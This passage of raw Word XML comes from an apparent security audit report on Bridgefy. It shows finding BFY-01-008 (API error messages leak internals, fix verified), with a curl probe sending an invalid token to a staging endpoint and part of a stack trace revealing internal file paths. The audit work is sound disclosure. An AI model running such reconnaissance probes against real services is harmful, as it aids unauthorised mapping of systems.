          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> sections of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP JSON Web_Token for Java Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>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0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487612928">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>167793</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="73" name="Graphic 73"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="73" name="Graphic 73"/>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3.212085pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15703552;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape58" coordorigin="1440,264" coordsize="2880,0" path="m1440,264l4320,264e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId159">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../JSON_Web_Token_for_Java_Cheat_Sheet.html#...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId160">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250031" w:id="24"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the SDK and main application APIs reveal information about API internals in error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>weakness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>obtain information about application internals, such as internal file paths and NodeJS modules in use,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>facilitate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>significant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue can be confirmed with the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Leak):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Authorization: Bearer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>anything'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>staging.sdk.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/bridgefy/dashboard/stats/home'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Leak):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>invalid."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"details"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>VerifyTokenDashError:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>invalid.\n at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ImplBndInfraJwt.verifyTokenDash (/app/src/infra/jwt-service.ts:65:13)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="731" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>UseCaseInfra.execValidTokenJwtDash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(/app/src/core/v1/usecases/uc-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>infra.ts:40:35)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MiddlewareTokenJwtDash.handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="6657" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(/app/src/api/middlewares/mid.token-jwt-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dash.ts:18:40)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="7449" w:val="left" w:leader="none"/>
          <w:tab w:pos="8043" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/app/node_modules/inversify-express-utils/src/server.ts:206:26\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Layer.handle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)\n</w:t>
        <w:tab/>
        <w:t>at next</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="6657" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
